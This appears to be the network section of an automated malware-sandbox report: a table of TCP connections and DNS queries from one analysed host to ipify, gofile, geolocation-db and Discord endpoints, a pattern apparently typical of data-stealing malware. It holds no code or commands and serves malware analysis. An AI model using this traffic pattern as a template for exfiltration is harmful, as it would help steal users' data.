                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.690259933 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.695312023 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.695398092 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.696806908 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.697110891 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.697926998 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.697988033 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.698105097 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.698122025 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.698255062 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.698935032 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.699270964 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.699316025 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.700659990 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.700737000 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.701724052 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.701735973 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.701853991 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.701864004 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.701872110 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.734915972 CET44349693159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.735111952 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.739542007 CET44349692159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.739770889 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.774334908 CET49693443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.693700075 CET49692443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.952910900 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.952969074 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.953062057 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.954152107 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.954168081 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.955054045 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.955091000 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.955171108 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.001642942 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.015484095 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.015531063 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.015995979 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.016026974 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.017591953 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.017708063 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.019416094 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.019442081 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.019583941 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.019591093 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.019613981 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.019649982 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.019655943 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.059063911 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.059525967 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.059560061 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.060784101 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.060878038 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.062820911 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.062839031 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.062944889 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.063031912 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.063050032 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.063111067 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.063117981 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.159008026 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.159053087 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.264301062 CET44349694162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.264578104 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.325135946 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.325237989 CET44349695162.159.128.233192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:19.325356960 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.056694984 CET49694443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.063313961 CET49695443192.168.2.5162.159.128.233
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.184555054 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.184627056 CET4434969651.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.184727907 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.313296080 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.313374996 CET4434969651.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.436244011 CET4434969651.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.518594980 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.665621996 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.665666103 CET4434969651.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.669193029 CET4434969651.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.669271946 CET4434969651.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.669286013 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.670752048 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.670770884 CET4434969651.38.43.18192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.671174049 CET49696443192.168.2.551.38.43.18
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.040185928 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.040267944 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.040425062 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.041831017 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.041852951 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.467710018 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.468307972 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.468353987 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.469656944 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.469794035 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.470948935 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.470974922 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.471092939 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.471163988 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.471179008 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.518568993 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.784123898 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.784288883 CET4434969764.185.227.155192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.784368038 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.785008907 CET49697443192.168.2.564.185.227.155
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.973083019 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.973149061 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.973244905 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.974442959 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.974488020 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.104501963 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.105026007 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.105087996 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.108202934 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.108350992 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.109615088 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.109641075 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.109791994 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.109798908 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.109864950 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.163785934 CET44349698159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.163973093 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.184227943 CET49698443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.325606108 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.325664997 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.325814009 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.326658010 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.326683044 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.374504089 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.376682043 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.376724958 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.379061937 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.379198074 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.380260944 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.380290985 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.380403042 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.380415916 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.380438089 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.380459070 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.380470037 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.518644094 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.518667936 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.650062084 CET44349699162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.650197983 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.650834084 CET49699443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.997504950 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.997560024 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.997740984 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.999432087 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.999456882 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.357148886 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.357806921 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.357830048 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.359523058 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.359642982 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.374845028 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.374875069 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.375001907 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.375009060 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.375077009 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.426350117 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.426389933 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.473098993 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.723059893 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.723154068 CET44349700104.237.62.211192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.723325968 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.725466967 CET49700443192.168.2.5104.237.62.211
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.853352070 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.853429079 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.853548050 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.854424000 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.854459047 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.968301058 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.968813896 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.968859911 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.971013069 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.971210003 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.972311974 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.972332954 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.972490072 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.972503901 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.972527027 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.019956112 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.019999981 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.043226957 CET44349701159.89.102.253192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.043325901 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.044004917 CET49701443192.168.2.5159.89.102.253
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.169680119 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.169761896 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.169856071 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.170948029 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.170994997 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.217991114 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.218466997 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.218533993 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.219835043 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.219955921 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.220985889 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.221012115 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.221132040 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.221179962 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.221196890 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.221247911 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.221271038 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.269952059 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.466192007 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.466355085 CET44349702162.159.137.232192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.466454983 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.466939926 CET49702443192.168.2.5162.159.137.232
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.803636074 CET5494953192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.825283051 CET53549498.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.836875916 CET5821853192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.856281996 CET53582188.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.197141886 CET6099853192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.219109058 CET53609988.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.545181990 CET5695353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.564898968 CET53569538.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.895343065 CET5928753192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.915142059 CET53592878.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.163604021 CET5864853192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.181955099 CET53586488.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.002707005 CET5689453192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.024468899 CET53568948.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.953958035 CET5029553192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.971434116 CET53502958.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.303461075 CET6084153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.324009895 CET53608418.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.977411032 CET6189353192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.995713949 CET53618938.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.832114935 CET6064953192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.851963043 CET53606498.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.147973061 CET5144153192.168.2.58.8.8.8
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.168028116 CET53514418.8.8.8192.168.2.5
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.803636074 CET192.168.2.58.8.8.80xa3b9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.836875916 CET192.168.2.58.8.8.80x8748Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.197141886 CET192.168.2.58.8.8.80x8120Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:17.545181990 CET192.168.2.58.8.8.80xd26Standard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:18.895343065 CET192.168.2.58.8.8.80xc4ccStandard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:20.163604021 CET192.168.2.58.8.8.80x7821Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.002707005 CET192.168.2.58.8.8.80xd4dfStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:21.953958035 CET192.168.2.58.8.8.80xd46dStandard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.303461075 CET192.168.2.58.8.8.80x4ad6Standard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:22.977411032 CET192.168.2.58.8.8.80x144cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:24.832114935 CET192.168.2.58.8.8.80xa73dStandard query (0)geolocation-db.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:25.147973061 CET192.168.2.58.8.8.80x952cStandard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.825283051 CET8.8.8.8192.168.2.50xa3b9No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.825283051 CET8.8.8.8192.168.2.50xa3b9No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.825283051 CET8.8.8.8192.168.2.50xa3b9No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.825283051 CET8.8.8.8192.168.2.50xa3b9No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.856281996 CET8.8.8.8192.168.2.50x8748No error (0)api.gofile.io51.38.43.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.856281996 CET8.8.8.8192.168.2.50x8748No error (0)api.gofile.io51.178.66.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:15.856281996 CET8.8.8.8192.168.2.50x8748No error (0)api.gofile.io151.80.29.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.219109058 CET8.8.8.8192.168.2.50x8120No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Feb 14, 2023 04:50:16.219109058 CET8.8.8.8192.168.2.50x8120No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
